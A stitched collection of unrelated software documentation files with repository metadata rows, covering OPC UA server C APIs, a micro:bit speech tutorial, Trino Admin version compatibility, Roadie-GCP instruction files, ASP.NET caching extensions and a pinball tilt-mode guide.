size_t outputArgumentsSize, const UA_Argument* outputArguments);
#endif
/* Deletes a node and optionally all references leading to the node. */
UA_StatusCode
UA_Server_deleteNode(UA_Server *server, const UA_NodeId nodeId,
UA_Boolean deleteReferences);
Reference Management
--------------------
.. code-block:: c
UA_StatusCode
UA_Server_addReference(UA_Server *server, const UA_NodeId sourceId,
const UA_NodeId refTypeId,
const UA_ExpandedNodeId targetId, UA_Boolean isForward);
UA_StatusCode
UA_Server_deleteReference(UA_Server *server, const UA_NodeId sourceNodeId,
const UA_NodeId referenceTypeId, UA_Boolean isForward,
const UA_ExpandedNodeId targetNodeId,
UA_Boolean deleteBidirectional);
.. _events:
Events
------
The method ``UA_Server_createEvent`` creates an event and represents it as node. The node receives a unique `EventId`
which is automatically added to the node.
The method returns a `NodeId` to the object node which represents the event through ``outNodeId``. The `NodeId` can
be used to set the attributes of the event. The generated `NodeId` is always numeric. ``outNodeId`` cannot be
``NULL``.
Note: In order to see an event in UAExpert, the field `Time` must be given a value!
The method ``UA_Server_triggerEvent`` "triggers" an event by adding it to all monitored items of the specified
origin node and those of all its parents. Any filters specified by the monitored items are automatically applied.
Using this method deletes the node generated by ``UA_Server_createEvent``. The `EventId` for the new event is
generated automatically and is returned through ``outEventId``. ``NULL`` can be passed if the `EventId` is not
needed. ``deleteEventNode`` specifies whether the node representation of the event should be deleted after invoking
the method. This can be useful if events with the similar attributes are triggered frequently. ``UA_TRUE`` would
cause the node to be deleted.
.. code-block:: c
#ifdef UA_ENABLE_SUBSCRIPTIONS_EVENTS
/* The EventQueueOverflowEventType is defined as abstract, therefore we can not
* create an instance of that type directly, but need to create a subtype. The
* following is an arbitrary number which shall refer to our internal overflow
* type. This is already posted on the OPC Foundation bug tracker under the
* following link for clarification:
* https://opcfoundation-onlineapplications.org/mantis/view.php?id=4206 */
# define UA_NS0ID_SIMPLEOVERFLOWEVENTTYPE 4035
/* Creates a node representation of an event
*
* @param server The server object
* @param eventType The type of the event for which a node should be created
* @param outNodeId The NodeId of the newly created node for the event
* @return The StatusCode of the UA_Server_createEvent method */
UA_StatusCode
UA_Server_createEvent(UA_Server *server, const UA_NodeId eventType,
UA_NodeId *outNodeId);
/* Triggers a node representation of an event by applying EventFilters and
adding the event to the appropriate queues.
* @param server The server object
* @param eventNodeId The NodeId of the node representation of the event which should be triggered
* @param outEvent the EventId of the new event
* @param deleteEventNode Specifies whether the node representation of the event should be deleted
* @return The StatusCode of the UA_Server_triggerEvent method */
UA_StatusCode
UA_Server_triggerEvent(UA_Server *server, const UA_NodeId eventNodeId, const UA_NodeId originId,
UA_ByteString *outEventId, const UA_Boolean deleteEventNode);
#endif /* UA_ENABLE_SUBSCRIPTIONS_EVENTS */
UA_StatusCode
UA_Server_updateCertificate(UA_Server *server,
const UA_ByteString *oldCertificate,
const UA_ByteString *newCertificate,
const UA_ByteString *newPrivateKey,
UA_Boolean closeSessions,
UA_Boolean closeSecureChannels);
Utility Functions
-----------------
.. code-block:: c
/* Add a new namespace to the server. Returns the index of the new namespace */
UA_UInt16 UA_Server_addNamespace(UA_Server *server, const char* name);
/* Get namespace by name from the server. */
UA_StatusCode
UA_Server_getNamespaceByName(UA_Server *server, const UA_String namespaceUri,
size_t* foundIndex);
#ifdef UA_ENABLE_HISTORIZING
UA_Boolean
UA_Server_AccessControl_allowHistoryUpdateUpdateData(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId,
UA_PerformUpdateType performInsertReplace,
const UA_DataValue *value);
UA_Boolean
UA_Server_AccessControl_allowHistoryUpdateDeleteRawModified(UA_Server *server,
const UA_NodeId *sessionId, void *sessionContext,
const UA_NodeId *nodeId,
UA_DateTime startTimestamp,
UA_DateTime endTimestamp,
bool isDeleteModified);
#endif // UA_ENABLE_HISTORIZING
| 47.28957 | 117 | 0.642286 |
19af50cf9561e1c1f1598135679c86f5a185fd5f | 7,574 | rst | reStructuredText | docs/tutorials/speech.rst | microbit-carlos/micropython | 9c8d0eacfd6728256e3712cb5d582f5d30017a2c | [
"MIT"
] | null | null | null | docs/tutorials/speech.rst | microbit-carlos/micropython | 9c8d0eacfd6728256e3712cb5d582f5d30017a2c | [
"MIT"
] | null | null | null | docs/tutorials/speech.rst | microbit-carlos/micropython | 9c8d0eacfd6728256e3712cb5d582f5d30017a2c | [
"MIT"
] | null | null | null | Speech
------
Computers and robots that talk feel more "human".
So often we learn about what a computer is up to through a graphical user
interface (GUI). In the case of a BBC micro:bit the GUI is a 5x5 LED matrix,
which leaves a lot to be desired.
Getting the micro:bit talk to you is one way to express information in a fun,
efficient and useful way. To this end, we have integrated a simple speech
synthesiser based upon a reverse-engineered version of a synthesiser from the
early 1980s. It sounds very cute, in an "all humans must die" sort of a way.
With this in mind, we're going to use the speech synthesiser to create...
DALEK Poetry
++++++++++++
.. image:: dalek.jpg
It's a little known fact that DALEKs enjoy poetry ~ especially limericks.
They go wild for anapestic meter with a strict AABBA form. Who'd have thought?
(Actually, as we'll learn below, it's The Doctor's fault DALEKs like limericks,
much to the annoyance of Davros.)
In any case, we're going to create a DALEK poetry recital on demand.
Say Something
+++++++++++++
Before the device can talk you need to plug in a speaker like this:
.. image:: ../speech.png
The simplest way to get the device to speak is to import the ``speech`` module
and use the ``say`` function like this::
import speech
speech.say("Hello, World")
While this is cute it's certainly not DALEK enough for our taste, so we need to
change some of the parameters that the speech synthesiser uses to produce the
voice. Our speech synthesiser is quite powerful in this respect because we can
change four parameters:
* ``pitch`` - how high or low the voice sounds (0 = high, 255 = Barry White)
* ``speed`` - how quickly the device talks (0 = impossible, 255 = bedtime story)
* ``mouth`` - how tight-lipped or overtly enunciating the voice sounds (0 = ventriloquist's dummy, 255 = Foghorn Leghorn)
* ``throat`` - how relaxed or tense is the tone of voice (0 = falling apart, 255 = totally chilled)
Collectively, these parameters control the quality of sound - a.k.a. the
timbre. To be honest, the best way to get the tone of voice you want is to
experiment, use your judgement and adjust.
To adjust the settings you pass them in as arguments to the ``say`` function.
More details can be found in the ``speech`` module's API documentation.
After some experimentation we've worked out this sounds quite DALEK-esque::
speech.say("I am a DALEK - EXTERMINATE", speed=120, pitch=100, throat=100, mouth=200)
Poetry on Demand
++++++++++++++++
Being Cyborgs DALEKs use their robot capabilities to compose poetry and it
turns out that the algorithm they use is written in Python like this::
# DALEK poetry generator, by The Doctor
import speech
import random
from microbit import sleep
# Randomly select fragments to interpolate into the template.
location = random.choice(["brent", "trent", "kent", "tashkent"])
action = random.choice(["wrapped up", "covered", "sang to", "played games with"])
obj = random.choice(["head", "hand", "dog", "foot"])
prop = random.choice(["in a tent", "with cement", "with some scent",
"that was bent"])
result = random.choice(["it ran off", "it glowed", "it blew up",
"it turned blue"])
attitude = random.choice(["in the park", "like a shark", "for a lark",
"with a bark"])
conclusion = random.choice(["where it went", "its intent", "why it went",
"what it meant"])
# A template of the poem. The {} are replaced by the named fragments.
poem = [
"there was a young man from {}".format(location),
"who {} his {} {}".format(action, obj, prop),
"one night after dark",
"{} {}".format(result, attitude),
"and he never worked out {}".format(conclusion),
"EXTERMINATE",
]
# Loop over each line in the poem and use the speech module to recite it.
for line in poem:
speech.say(line, speed=120, pitch=100, throat=100, mouth=200)
sleep(500)
As the comments demonstrate, it's a very simple in design:
* Named fragments (``location``, ``prop``, ``attitude`` etc) are randomly generated from pre-defined lists of possible values. Note the use of ``random.choice`` to select a single item from a list.
* A template of a poem is defined as a list of stanzas with "holes" in them (denoted by ``{}``) into which the named fragments will be put using the ``format`` method.
* Finally, Python loops over each item in the list of filled-in poetry stanzas and uses ``speech.say`` with the settings for the DALEK voice to recite the poem. A pause of 500 milliseconds is inserted between each line because even DALEKs need to take a breath.
Interestingly the original poetry related routines were written by Davros in
`FORTRAN <https://en.wikipedia.org/wiki/Fortran>`_ (an appropriate
language for DALEKS since you type it ALL IN CAPITAL LETTERS). However, The
Doctor went back in time to precisely the point between Davros's
`unit tests <https://en.wikipedia.org/wiki/Unit_testing>`_
passing and the
`deployment pipeline <https://en.wikipedia.org/wiki/Continuous_delivery>`_
kicking in. At this instant he was able to insert a MicroPython interpreter
into the DALEK operating system and the code you see above into the DALEK
memory banks as a sort of long hidden Time-Lord
`Easter Egg <https://en.wikipedia.org/wiki/Easter_egg_(media)>`_ or
`Rickroll <https://www.youtube.com/watch?v=dQw4w9WgXcQ>`_.
Phonemes
++++++++
You'll notice that sometimes, the ``say`` function doesn't accurately translate
from English words into the correct sound. To have fine grained control of the
output, use phonemes: the building-block sounds of language.
The advantage of using phonemes is that you don't have to know how to spell!
Rather, you only have to know how to say the word in order to spell it
phonetically.
A full list of the phonemes the speech synthesiser understands can be found in
the API documentation for speech. Alternatively, save yourself a lot of time by
passing in English words to the ``translate`` function. It'll return a first
approximation of the phonemes it would use to generate the audio. This result
can be hand-edited to improve the accuracy, inflection and emphasis (so it
sounds more natural).
The ``pronounce`` function is used for phoneme output like this::
speech.pronounce("/HEH5EH4EH3EH2EH2EH3EH4EH5EHLP.”)
How could you improve on The Doctor's code to make it use phonemes?
Sing A Song of Micro:bit
++++++++++++++++++++++++
By changing the ``pitch`` setting and calling the ``sing`` function it's
possible to make the device sing (although it's not going to win Eurovision any
time soon).
The mapping from pitch numbers to musical notes is shown below:
.. image:: ../speech-pitch.png
The ``sing`` function must take phonemes and pitch as input like this::
speech.sing("#115DOWWWW")
Notice how the pitch to be sung is prepended to the phoneme with a hash
(``#``). The pitch will remain the same for subsequent phonemes until a new
pitch is annotated.
The following example demonstrates how all three generative functions (``say``,
``pronounce`` and ``sing``) can be used to produce speech like output:
.. include:: ../../examples/speech.py
:code: python
.. footer:: The image of the DALEK is licensed as per the details here: https://commons.wikimedia.org/wiki/File:Dalek_(Dr_Who).jpg The image of DAVROS is licensed as per the details here: https://en.wikipedia.org/wiki/File:Davros_and_Daleks.jpg
| 43.528736 | 261 | 0.716794 |
948dfa557f47e21758a3fa1e3fc01275ead758c3 | 133 | rst | reStructuredText | docs/source/reference/multi_objective/index.rst | uskfujino/optuna | 15a1878f80b3dc6f064d8d654509154004f9f46f | [
"MIT"
] | null | null | null | docs/source/reference/multi_objective/index.rst | uskfujino/optuna | 15a1878f80b3dc6f064d8d654509154004f9f46f | [
"MIT"
] | null | null | null | docs/source/reference/multi_objective/index.rst | uskfujino/optuna | 15a1878f80b3dc6f064d8d654509154004f9f46f | [
"MIT"
] | 1 | 2020-12-25T03:28:09.000Z | 2020-12-25T03:28:09.000Z | .. module:: optuna.multi_objective
Multi-objective
===============
.. toctree::
:maxdepth: 2
samplers
study
trial
| 11.083333 | 34 | 0.56391 |
9b99173c378b6e7a88d10765b82e717ba9991aa3 | 854 | rst | reStructuredText | docs/compatibility.rst | wgzhao/trino-admin | cd2c71e4d0490cf836a7ddf0dbab69b967408ac8 | [
"Apache-2.0"
] | null | null | null | docs/compatibility.rst | wgzhao/trino-admin | cd2c71e4d0490cf836a7ddf0dbab69b967408ac8 | [
"Apache-2.0"
] | 2 | 2021-10-19T05:37:09.000Z | 2022-03-29T22:07:21.000Z | docs/compatibility.rst | wgzhao/trino-admin | cd2c71e4d0490cf836a7ddf0dbab69b967408ac8 | [
"Apache-2.0"
] | 1 | 2021-12-27T02:38:32.000Z | 2021-12-27T02:38:32.000Z | ============================
Presto version compatibility
============================
The following matrix details the compatible Trino Admin and Presto versions.
============================ ================================
Trino Admin version Compatible Trino/Presto versions
============================ ================================
2.13 345+
2.12 345
2.11 338
2.10 332
2.9 332
2.8 323
2.7 312
2.6 302
2.5 0.213
2.5 0.208
2.4, 2.5 0.203
2.4, 2.5 0.195
2.3 0.188
============================ ================================
| 35.583333 | 76 | 0.251756 |
83abafcfaba80664d0c171c118cb3847406d454f | 381 | rst | reStructuredText | examples/integriot_two_nodes/leds/README.rst | ulno/iot-devkit | 6e90c1c207f23c4b5bf374f58d3701550e6c70ca | [
"MIT"
] | null | null | null | examples/integriot_two_nodes/leds/README.rst | ulno/iot-devkit | 6e90c1c207f23c4b5bf374f58d3701550e6c70ca | [
"MIT"
] | null | null | null | examples/integriot_two_nodes/leds/README.rst | ulno/iot-devkit | 6e90c1c207f23c4b5bf374f58d3701550e6c70ca | [
"MIT"
] | 1 | 2020-07-23T03:03:38.000Z | 2020-07-23T03:03:38.000Z | Node Description
================
this node is named 'infoboard' and has two actors:
- led1: the onboard led, can be switched on with the "on" message and off with the "off" message
Connected devices
-----------------
Describe which devices (actors and sensors) are connected to it.
the onboardled is used
Functionality
-------------
The led can be switched on and off.
| 19.05 | 98 | 0.661417 |
129ebc7948a62127133bb30c0ea534d5585b865a | 238 | rst | reStructuredText | doc/source/iam/api-reference/tenant-management.rst | opentelekomcloud/docs | bf7f76b5c8f74af898e3b3f726ee563c89ec2fed | [
"Apache-2.0"
] | 1 | 2020-03-29T08:41:50.000Z | 2020-03-29T08:41:50.000Z | doc/source/iam/api-reference/tenant-management.rst | opentelekomcloud/docs | bf7f76b5c8f74af898e3b3f726ee563c89ec2fed | [
"Apache-2.0"
] | 34 | 2020-02-21T17:23:45.000Z | 2020-09-30T09:23:10.000Z | doc/source/iam/api-reference/tenant-management.rst | OpenTelekomCloud/docs | bf7f76b5c8f74af898e3b3f726ee563c89ec2fed | [
"Apache-2.0"
] | 14 | 2017-08-01T09:33:20.000Z | 2019-12-09T07:39:26.000Z | =================
Tenant Management
=================
.. toctree::
:maxdepth: 1
querying-the-list-of-domains-accessible-to-users.md
querying-the-password-strength-policy.md
querying-the-password-strength-policy-by-option.md
| 21.636364 | 54 | 0.642857 |
b09d6216f6627a818ee97fb6049b7164c90ca16c | 2,405 | rst | reStructuredText | doc_src/source/ships/ship_classes.rst | gtaylor/dott | b0dfbecc1171ed82566ecf814a73ce3dcaa468be | [
"BSD-3-Clause"
] | 3 | 2016-01-10T09:22:01.000Z | 2016-05-01T23:16:16.000Z | doc_src/source/ships/ship_classes.rst | gtaylor/dott | b0dfbecc1171ed82566ecf814a73ce3dcaa468be | [
"BSD-3-Clause"
] | 1 | 2016-03-29T02:52:49.000Z | 2016-03-29T02:52:49.000Z | doc_src/source/ships/ship_classes.rst | gtaylor/dott | b0dfbecc1171ed82566ecf814a73ce3dcaa468be | [
"BSD-3-Clause"
] | 1 | 2020-04-16T15:45:26.000Z | 2020-04-16T15:45:26.000Z | .. _ships-ship_classes:
============
Ship Classes
============
There are many different sizes of ships, typically called a *ship class*. While
a ship's class does not limit it to certain roles, the class and size of a ship
strongly influence what said ship can be used for.
A newer player will most likely start with Fighters, working their way up
to whatever ship class feels most comfortable.
.. tip:: Bigger does not always mean better for every situation.
Fighters
--------
Fighters are small, single-pilot ships that require no crew. While some
fighter class ships may be able to carry more than one person, this is the
solo pilot's bread and butter.
Frigates
--------
Frigates are the smallest vessel that is typically manned by a crew, instead
of a single pilot. Frigates are small and simple enough to be easy and
efficient to operate without help or escort.
Cruisers
--------
Cruisers are the next step up from frigates, trading speed and maneuverability
for more defensive and/or offensive capabilities. Cruisers typically benefit
from having others aboard.
Cruisers may have a difficult time fending off Fighters without Fighter or
Frigate support of their own.
Battlecruisers
--------------
Battlecruisers are the size of a Cruiser, but typically carry Battleship
weaponry. This allows for a cheap way to attack larger targets without
having to rely exclusively on the more expensive and cumbersom Battleships.
Battlecruisers tend to be about as durable as a Cruiser. Due to their larger
weapons (meant for larger targets), Battlecruisers may struggle to fend
off Fighters and Frigates effectively.
Battleships
-----------
Battleships are large, lumbering mammoths, often bristling with lots of nasty
weaponry. These ships' sole purpose is to deal out as much pain as possible,
meanwhile absorbing as much retaliation as possible.
Battleships are almost never seen alone, and require the support of smaller
ships. Battleships are particularly ill-equipped to defend themselves from
large groups of Fighters and Frigates.
Capital Ships
-------------
Capital Ships are the largest ships to grace the space lanes. These range in
purpose from mass cargo freighters, to factory ships, to Carriers and
Dreadnaughts.
Capital Ships are typically very specialized, extremely expensive, and reliant
upon fleet support. Capitals may often field and maintain a complement of
Fighters.
| 33.402778 | 79 | 0.77921 |
cc0d25e64145d03c727d6d94df41cec9e87f04dd | 3,285 | rst | reStructuredText | docs/source/instruction.rst | jkawamoto/roadie-gcp | 96394a47d375bd01e167f351fc86a03905e98395 | [
"MIT"
] | 1 | 2018-09-20T01:51:23.000Z | 2018-09-20T01:51:23.000Z | docs/source/instruction.rst | jkawamoto/roadie-gcp | 96394a47d375bd01e167f351fc86a03905e98395 | [
"MIT"
] | 9 | 2016-01-31T11:28:12.000Z | 2021-04-30T20:43:39.000Z | docs/source/instruction.rst | jkawamoto/roadie-gcp | 96394a47d375bd01e167f351fc86a03905e98395 | [
"MIT"
] | null | null | null | Instruction file
===================
An instruction file is a YAML document. It has three top-level elements;
``apt``, ``source``, ``data``, ``run``, ``result``, and ``upload``.
apt
-----
The ``apt`` section specifies a package list to be installed via apt.
.. code-block:: yaml
apt:
- nodejs
- package_a
- package_b
souce
-------
The ``source`` section specifics how to obtain source codes.
It could have either git repository URL or normal URL.
A git repository URL is a URL ends with ``.git``.
Such URLs will be used with ``git clone``.
If you want to use ssh to connect your repository,
you may need to deploy valid ssh keys in ``/root/.ssh`` in this container.
For *normal URL*, in addition to the basic scheme ``http`` and ``https``,
this url supports ``gs`` which means an object in Google Cloud Storage, and ``dropbox``.
See the next section for detail.
Example
.........
Clone source code from a git repository:
.. code-block:: yaml
source: https://github.com/itslab-kyushu/youtube-comment-scraper.git
Download source code from some web server:
.. code-block:: yaml
source: https://exmaple.com/abc.txt
Download source code from Google Cloud Storage:
.. code-block:: yaml
source: gs://your_bucket/path_to_object
Download source code from Dropbox:
.. code-block:: yaml
source: dropbox://www.dropbox.com/sh/abcdefg/ABCDEFGHIJKLMN
data
------
The ``data`` section specifies URLs to be downloaded.
It must be a list of extended URLs and the format of extended URL is
``scheme://hostname/path`` or ``scheme://hostname/path:dest``
URL schemes Roadie-GCP supports are ``gs``, ``dropbox`` and schemes which ``curl`` supports.
To download objects, Roadie-GCP uses ``curl`` but uses ``gsutil`` for ``gs`` scheme.
``dropbox`` is a pseudo scheme to download objects from `Dropbox <https://www.dropbox.com/>`_.
To use this scheme, get public URL from Dropbox and then replace ``https`` to ``dropbox``.
When you download objects via Dropbox's public link, they are zipped.
Using ``dropbox`` scheme will unzip those objects.
Downloaded objects will be put in ``/data`` which is the default working directory.
You can also use the second format of URL to specify destinations of objects.
run
-----
The ``run`` section specifies what commands will be run.
It must be a list of commands.
Those commands will be executed via shell.
STDOUT of those commands will be stored to files named ``stdout*.txt`` and uploaded to Google Cloud Storage.
For example, the outputs of the first commands will be stored to ``stdout0.txt``.
On the other hands, STRERR will be outputted to docker logs.
result
--------
The ``result`` section specifies where outputted results should be stored.
Outputted results include STDOUT of each commands.
Roadie-GCP supports only a place in Google Cloud Storage, currently.
Thus, the value of the ``result`` element must be a URL of which scheme is ``gs``.
upload
--------
The ``upload`` section specifies other files to be uploaded as results.
This section consist of a list of glob patterns.
Objects matching to one of the patterns will be uploaded to the cloud storage.
Each glob pattern can have a destination after ``:``.
For example, ``"*.out:result`` means objects matching ``*.out`` will be uploaded to ``result`` folder.
| 32.524752 | 108 | 0.722679 |
bf689d416d2e4d428d21ca06bb77c1b45f8a655a | 148 | rst | reStructuredText | docs/eye.helpers.margins.rst | hydrargyrum/eye | b4a6994fee74b7a70d4f918bc3a29184fe8d5526 | [
"WTFPL"
] | 12 | 2015-09-07T18:32:15.000Z | 2021-02-21T17:29:15.000Z | docs/eye.helpers.margins.rst | hydrargyrum/eye | b4a6994fee74b7a70d4f918bc3a29184fe8d5526 | [
"WTFPL"
] | 20 | 2016-08-01T19:24:43.000Z | 2020-12-23T21:29:04.000Z | docs/eye.helpers.margins.rst | hydrargyrum/eye | b4a6994fee74b7a70d4f918bc3a29184fe8d5526 | [
"WTFPL"
] | 1 | 2018-09-07T14:26:24.000Z | 2018-09-07T14:26:24.000Z | eye.helpers.margins module
==========================
.. automodule:: eye.helpers.margins
:members:
:undoc-members:
:show-inheritance:
| 18.5 | 35 | 0.567568 |
10781019a3faeaf7f850ca2a7e5caf3d118f6a0d | 259 | rst | reStructuredText | doc/reference/rtos_drivers/spi/spi.rst | danielpieczko/xcore_sdk | abb3bdc62d72fa8c13e77f778312ba9f8b29c0f4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | doc/reference/rtos_drivers/spi/spi.rst | danielpieczko/xcore_sdk | abb3bdc62d72fa8c13e77f778312ba9f8b29c0f4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | doc/reference/rtos_drivers/spi/spi.rst | danielpieczko/xcore_sdk | abb3bdc62d72fa8c13e77f778312ba9f8b29c0f4 | [
"Naumen",
"Condor-1.1",
"MS-PL"
] | null | null | null | ###############
SPI RTOS Driver
###############
This driver can be used to instantiate and control a SPI master or slave mode I/O interface on XCore in an RTOS application.
.. toctree::
:maxdepth: 2
:includehidden:
spi_master.rst
spi_slave.rst
| 19.923077 | 124 | 0.644788 |
8b71d0c59ef657abbc5cb1f8bd48dc35bc1d85dd | 169 | rst | reStructuredText | projects/rumigen/project-description.rst | FAANG/comm-data-portal-projects | bc184cf442265cfe0da65aa6f456e42e8386cfc3 | [
"Apache-2.0"
] | null | null | null | projects/rumigen/project-description.rst | FAANG/comm-data-portal-projects | bc184cf442265cfe0da65aa6f456e42e8386cfc3 | [
"Apache-2.0"
] | null | null | null | projects/rumigen/project-description.rst | FAANG/comm-data-portal-projects | bc184cf442265cfe0da65aa6f456e42e8386cfc3 | [
"Apache-2.0"
] | null | null | null | RUMIGEN is a multi-actor project aiming to improve genetic tools in bovine breeds through the addition of new traits such as heat tolerance, and epigenetic information.
| 84.5 | 168 | 0.828402 |
e3c1b2a96f559b0bfe18f26315bf59ed4e9ac0e4 | 2,022 | rst | reStructuredText | docs/source/unused/deprecated/Logging.rst | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | 1 | 2021-04-20T12:03:36.000Z | 2021-04-20T12:03:36.000Z | docs/source/unused/deprecated/Logging.rst | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | null | null | null | docs/source/unused/deprecated/Logging.rst | rmay-intwine/volttron | a449f70e32f73ff0136a838d0feddb928ede6298 | [
"Apache-2.0"
] | 1 | 2018-08-14T23:28:10.000Z | 2018-08-14T23:28:10.000Z | Data Logging
------------
A mechanism allowing agents to store timeseries data has been provided.
In VOLTTRON 2.0 this facility was provided by an sMAP agent but it has
now been folded into the new Historians. This service still uses the old
format to maintain compatibility.
Data Logging Format
~~~~~~~~~~~~~~~~~~~
Data sent to the data logger should be sent as a JSON object that
consists of a dictionary of dictionaries. The keys of the outer
dictionary are used as the points to store the data items. The inner
dictionary consists of 2 required fields and 1 optional. The required
fields are "Readings" and "Units". Readings contains the data that will
be written. It may contain either a single value, or a list of lists
which consists of timestamp/value pairs. Units is a string that
identifies the meaning of the scale values of the data. The optional
entry is data\_type, which indicates the type of the data to be stored.
This may be either long or double.
::
{
"test3": {
"Readings": [[1377788595, 1.1],[1377788605,2.0]],
"Units": "KwH",
"data_type": "double"
},
"test4": {
"Readings": [[1377788595, 1.1],[1377788605,2.0]],
"Units": "TU",
"data_type": "double"
}
}
Example Code
~~~~~~~~~~~~
::
headers[headers_mod.FROM] = self._agent_id
headers[headers_mod.CONTENT_TYPE] = headers_mod.CONTENT_TYPE.JSON
mytime = int(time.time())
content = {
"listener": {
"Readings": [[mytime, 1.0]],
"Units": "TU",
"data_type": "double"
},
"hearbeat": {
"Readings": [[mytime, 1.0]],
"Units": "TU",
"data_type": "double"
}
}
self.publish('datalogger/log/', headers, json.dumps(content))
| 31.107692 | 77 | 0.560831 |
378f8b2b50b22b19c3e075ff7f207ea1c5bd7064 | 4,578 | rst | reStructuredText | api/autoapi/Microsoft/Extensions/Caching/Memory/CacheExtensions/index.rst | lucasvfventura/Docs | ea93e685c737236ab08d5444065cc550bba17afa | [
"Apache-2.0"
] | 2 | 2017-12-12T05:08:17.000Z | 2021-02-08T10:15:42.000Z | api/autoapi/Microsoft/Extensions/Caching/Memory/CacheExtensions/index.rst | lucasvfventura/Docs | ea93e685c737236ab08d5444065cc550bba17afa | [
"Apache-2.0"
] | null | null | null | api/autoapi/Microsoft/Extensions/Caching/Memory/CacheExtensions/index.rst | lucasvfventura/Docs | ea93e685c737236ab08d5444065cc550bba17afa | [
"Apache-2.0"
] | 3 | 2017-12-12T05:08:29.000Z | 2022-02-02T08:39:25.000Z |
CacheExtensions Class
=====================
.. contents::
:local:
Inheritance Hierarchy
---------------------
* :dn:cls:`System.Object`
* :dn:cls:`Microsoft.Extensions.Caching.Memory.CacheExtensions`
Syntax
------
.. code-block:: csharp
public class CacheExtensions
GitHub
------
`View on GitHub <https://github.com/aspnet/caching/blob/master/src/Microsoft.Extensions.Caching.Abstractions/MemoryCacheExtensions.cs>`_
.. dn:class:: Microsoft.Extensions.Caching.Memory.CacheExtensions
Methods
-------
.. dn:class:: Microsoft.Extensions.Caching.Memory.CacheExtensions
:noindex:
:hidden:
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Get(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:rtype: System.Object
.. code-block:: csharp
public static object Get(IMemoryCache cache, object key)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Get<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:rtype: {TItem}
.. code-block:: csharp
public static TItem Get<TItem>(IMemoryCache cache, object key)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, System.Object)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: System.Object
:rtype: System.Object
.. code-block:: csharp
public static object Set(IMemoryCache cache, object key, object value)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, System.Object, Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: System.Object
:type options: Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions
:rtype: System.Object
.. code-block:: csharp
public static object Set(IMemoryCache cache, object key, object value, MemoryCacheEntryOptions options)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, TItem)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: {TItem}
:rtype: {TItem}
.. code-block:: csharp
public static TItem Set<TItem>(IMemoryCache cache, object key, TItem value)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.Set<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, TItem, Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: {TItem}
:type options: Microsoft.Extensions.Caching.Memory.MemoryCacheEntryOptions
:rtype: {TItem}
.. code-block:: csharp
public static TItem Set<TItem>(IMemoryCache cache, object key, TItem value, MemoryCacheEntryOptions options)
.. dn:method:: Microsoft.Extensions.Caching.Memory.CacheExtensions.TryGetValue<TItem>(Microsoft.Extensions.Caching.Memory.IMemoryCache, System.Object, out TItem)
:type cache: Microsoft.Extensions.Caching.Memory.IMemoryCache
:type key: System.Object
:type value: {TItem}
:rtype: System.Boolean
.. code-block:: csharp
public static bool TryGetValue<TItem>(IMemoryCache cache, object key, out TItem value)
| 23.476923 | 215 | 0.608563 |
ae47770012c255e91864956fe0a8b18960debc82 | 10,176 | rst | reStructuredText | _not_updated_yet/howtocreateatilt-3696.rst | AdrianD72/mpf-docs | bb20f9af918cfb194491da01d5502b666278f847 | [
"MIT"
] | 15 | 2016-03-26T05:26:29.000Z | 2021-08-28T18:43:04.000Z | _not_updated_yet/howtocreateatilt-3696.rst | AdrianD72/mpf-docs | bb20f9af918cfb194491da01d5502b666278f847 | [
"MIT"
] | 274 | 2016-04-11T16:14:36.000Z | 2022-03-29T20:43:14.000Z | _not_updated_yet/howtocreateatilt-3696.rst | AdrianD72/mpf-docs | bb20f9af918cfb194491da01d5502b666278f847 | [
"MIT"
] | 99 | 2016-04-12T23:25:24.000Z | 2022-02-23T22:08:37.000Z |
This How To guide explains how to configure a tilt in MPF. The MPF
package contains a the code for a tilt mode which runs at all times to
watch for tilts, so all you have to do to use add some configs to your
machine’s *modes* folder and you’re all set. Features of the tilt mode
include:
+ Separate processing of tilt warning, tilt, and slam tilt events.
+ Specify that several tilt warnings coming close together only count
as one warning.
+ Specify "settle time" that the tilt warning switch has to not
activate in order to let it "settle" between players (so the next
player after a super hard tilt doesn't get a tilt also because the
plumb bob was still swinging).
+ Configurable options for when a player's tilt warnings are reset
(per game, per ball, etc.).
+ Flexible events you can use to trigger display, sound, and lighting
effects when tilt warnings occur.
Let's dig in to the process of actually getting the tilt setup.
(A) Create your 'tilt' mode folder
----------------------------------
The tilt mode works like any other mode in MPF. You’ll create a folder
called *tilt* in your machine’s *modes* folder, and that folder will
contain subfolders config files, images, etc. So to begin, create a
folder called *<your_machine>/modes/tilt*. Then inside there, create
another folder called *config*. Then inside there, create a file
called *tilt.yaml*. (So that file should be at
*<your_machine>/modes/tilt/config/tilt.yaml*.) Your folder structure
should look something like this:
(B) Configure options for the tilt mode
---------------------------------------
Open up the tilt mode's config file that you just copied into your
machine folder. It should be at
